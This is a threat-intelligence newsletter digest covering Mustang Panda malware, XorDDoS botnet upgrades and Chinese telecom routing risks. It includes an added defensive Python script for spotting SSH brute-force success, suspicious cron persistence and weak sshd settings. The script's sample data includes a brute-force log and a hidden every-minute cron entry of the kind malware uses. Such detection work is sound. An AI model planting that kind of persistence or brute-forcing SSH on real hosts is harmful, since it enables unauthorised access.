FROM THE MEDIA: Zscaler researchers identified Mustang Panda deploying four new malware tools during a recent attack on a Myanmar-based organization. The tools include keyloggers PAKLOG and CorKLOG, a lateral movement utility dubbed StarProxy, and an EDR evasion driver named SplatCloak. PAKLOG collects keystrokes and clipboard data, while CorKLOG adds encryption and persistence features. StarProxy enables internal network traversal using FakeTLS, and SplatCloak disables kernel callbacks from antivirus programs. The group’s signature backdoor, ToneShell, has also been updated to refine host fingerprinting and C2 communication, making Mustang Panda’s operations more secure and more challenging to detect.
READ THE STORY: DR
XorDDoS Malware Upgraded with Layered Botnet Infrastructure and Advanced Evasion Tactics
Bottom Line Up Front (BLUF): Cisco Talos researchers have identified a major upgrade to the XorDDoS malware, introducing a hierarchical controller structure and new evasion capabilities. The revamped infrastructure enables large-scale DDoS attacks, with over 70% of observed targets located in the United States and supporting attack throughput of 12.7 Gbps.
Analyst Comments: The enhanced XorDDoS ecosystem marks a significant evolution in Linux-based botnet operations, with Chinese-speaking actors now employing modular architectures, encrypted communications, and cloud-targeted techniques. The shift to Docker exploitation and process injection reflects growing attacker sophistication in targeting containerized environments. To counter this threat, enterprises should prioritize SSH hardening, Docker runtime monitoring, and detection of CRC-header anomalies.
FROM THE MEDIA: Between November 2023 and February 2025, Talos observed a surge in XorDDoS malware activity, particularly against U.S.-based systems. The upgraded variant features a "VIP version" controller, a three-tiered command structure, and encrypted protocols for stealth. The malware spreads through SSH brute-force attacks, persists via cron jobs, and its enhanced DDoS services are actively marketed on underground forums. Analysis shows 49.3% of infected devices are in the U.S., with China, India, Taiwan, and Japan also affected.
READ THE STORY: GBhackers
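The two behaviours named above, SSH password brute-forcing and cron persistence, and the SSH hardening the analyst comment recommends, can all be checked from host artifacts. The following is an added example, not code from Cisco Talos or the article: it scans auth.log lines for a password-guessing burst from one source followed by a successful password login from that same source, flags system-crontab entries that run from scratch or hidden directories or every minute, and reports the sshd_config settings that make the brute force possible in the first place. The log lines, crontab entries and config fragment are constructed; the addresses are from RFC 5737 documentation ranges, not XorDDoS infrastructure.

```python
"""
Added example (not from Cisco Talos or the article): detection of SSH
brute-force success, suspicious cron persistence, and weak sshd settings.
All sample input below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")

def _ts(s: str) -> datetime:
    # syslog timestamps carry no year; fine for deltas within one file
    return datetime.strptime(s, "%b %d %H:%M:%S")

def ssh_bruteforce(lines, threshold: int = 5, window_s: int = 120) -> dict:
    """Per source IP: largest burst of failed password logins inside the window, and
    the users for which a password login later succeeded from that source."""
    events = defaultdict(list)
    for line in lines:
        m = SSH_RE.match(line)
        if m:
            events[m["ip"]].append((_ts(m["ts"]), m["result"], m["method"], m["user"]))
    report = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [t for t, r, meth, _ in evs if r == "Failed" and meth == "password"]
        burst = max((sum(1 for t in fails if 0 <= (t - start).total_seconds() <= window_s)
                     for start in fails), default=0)
        if burst >= threshold:
            success = [u for t, r, meth, u in evs
                       if r == "Accepted" and meth == "password" and t >= fails[0]]
            report[ip] = {"failed": len(fails), "burst": burst, "compromised_users": success}
    return report

UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def suspicious_cron(entries) -> list:
    """Flag system-crontab lines (m h dom mon dow user command) that run from scratch
    or hidden paths, or on an every-minute schedule."""
    hits = []
    for line in entries:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        sched, cmd = " ".join(parts[:5]), parts[6]
        reasons = []
        if cmd.startswith(UNTRUSTED_DIRS) or "/." in cmd:
            reasons.append("runs from scratch or hidden path")
        if sched.startswith(("* ", "*/1 ")):
            reasons.append("every-minute schedule")
        if reasons:
            hits.append((line, reasons))
    return hits

def weak_sshd_settings(config: str) -> dict:
    """Return {setting: (current, recommended)} for settings that permit password guessing."""
    wanted = {"passwordauthentication": "no", "permitrootlogin": "no"}
    seen = {}
    for line in config.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            k, _, v = line.partition(" ")
            seen[k.lower()] = v.strip()
    return {k: (seen.get(k, "<default>"), fix) for k, fix in wanted.items()
            if seen.get(k, "").lower() != fix}

# Constructed samples (RFC 5737 addresses; not real XorDDoS infrastructure).
SAMPLE_AUTH_LOG = """\
Apr 18 03:12:01 host sshd[2211]: Failed password for root from 203.0.113.7 port 51022 ssh2
Apr 18 03:12:02 host sshd[2213]: Failed password for root from 203.0.113.7 port 51030 ssh2
Apr 18 03:12:03 host sshd[2215]: Failed password for invalid user admin from 203.0.113.7 port 51041 ssh2
Apr 18 03:12:04 host sshd[2217]: Failed password for root from 203.0.113.7 port 51052 ssh2
Apr 18 03:12:05 host sshd[2219]: Failed password for root from 203.0.113.7 port 51063 ssh2
Apr 18 03:12:09 host sshd[2224]: Accepted password for root from 203.0.113.7 port 51099 ssh2
Apr 18 08:00:00 host sshd[3001]: Accepted publickey for alice from 198.51.100.4 port 40000 ssh2
Apr 18 08:05:10 host sshd[3010]: Failed password for alice from 198.51.100.4 port 40010 ssh2
""".splitlines()
SAMPLE_CRONTAB = """\
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root /var/tmp/.x/udev >/dev/null 2>&1
""".splitlines()
SAMPLE_SSHD_CONFIG = """\
# constructed fragment: the weak settings a password brute force depends on
PermitRootLogin yes
PasswordAuthentication yes
"""

if __name__ == "__main__":
    print("brute force:", ssh_bruteforce(SAMPLE_AUTH_LOG))
    print("cron:", suspicious_cron(SAMPLE_CRONTAB))
    print("sshd:", weak_sshd_settings(SAMPLE_SSHD_CONFIG))
```

The brute-force report pairs the failure burst with the later password success from the same source, which is the event worth paging on; a burst alone is background noise on any internet-facing host. Setting `PasswordAuthentication no` and `PermitRootLogin no` (the two values the checker recommends) removes the credential-guessing path entirely, at which point the cron check becomes the main post-compromise signal.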
Items of interest
Chinese Telecom Networks Handle Traffic in 35 Countries, Raising Global Surveillance Risks
Bottom Line Up Front (BLUF): A new analysis from iVerify reveals that 35 countries, including U.S. allies like Japan, New Zealand, and Saudi Arabia, use China-based telecom networks to route mobile user traffic, creating potential exposure to surveillance and cyber espionage. U.S. authorities are investigating several Chinese telecoms for allegedly evading restrictions and facilitating unauthorized access to sensitive data.
Analyst Comments: While efforts to rip and replace Huawei and ZTE gear have focused on domestic networks, the international routing of mobile traffic via Chinese-controlled interconnect services remains a blind spot. Chinese state-aligned firms’ ability to access device authentication, SMS delivery, and location data could serve both intelligence gathering and influence operations. The U.S. and its allies may push for new international telecom security standards and encryption mandates to reduce exposure.
FROM THE MEDIA: CyberScoop reported findings from cybersecurity firm iVerify showing that 60 mobile operators across 35 countries rely on Chinese or Hong Kong-based interconnect services—namely China Mobile International, China Telecom Global, China Unicom Global, CITIC Telecom, and PCCW Global. These entities, operating under Chinese government oversight, are positioned to intercept or manipulate user data in transit. The report warns that their deep access to mobile signaling functions presents an overlooked vector for exploitation. iVerify’s findings were derived from documents submitted to the GSM Association. U.S. authorities, including the FCC, are investigating whether these firms circumvent existing telecom bans. Encryption standards for global mobile signaling are also under renewed scrutiny, with experts suggesting it's time to reassess how much metadata must remain unencrypted for routing.
READ THE STORY: CYBERSCOOP
Examining China’s telecommunications ambitions (Video)
FROM THE MEDIA: China’s growing influence in the telecommunications sector has recently been met with increasing controversy. The most prevalent example is the United States’ concern over including Huawei technologies in its telecommunication networks and those of its allies and partners worldwide. China’s inroads into the telecommunications arena have ignited debates over the geopolitical and strategic importance of telecommunications and the nature of China’s ambitions and strategic thinking.
How China Hacked America’s Phone Network (Video)
FROM THE MEDIA: An alarming new hack by China has penetrated the nerve center of the United States: its telephone network.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.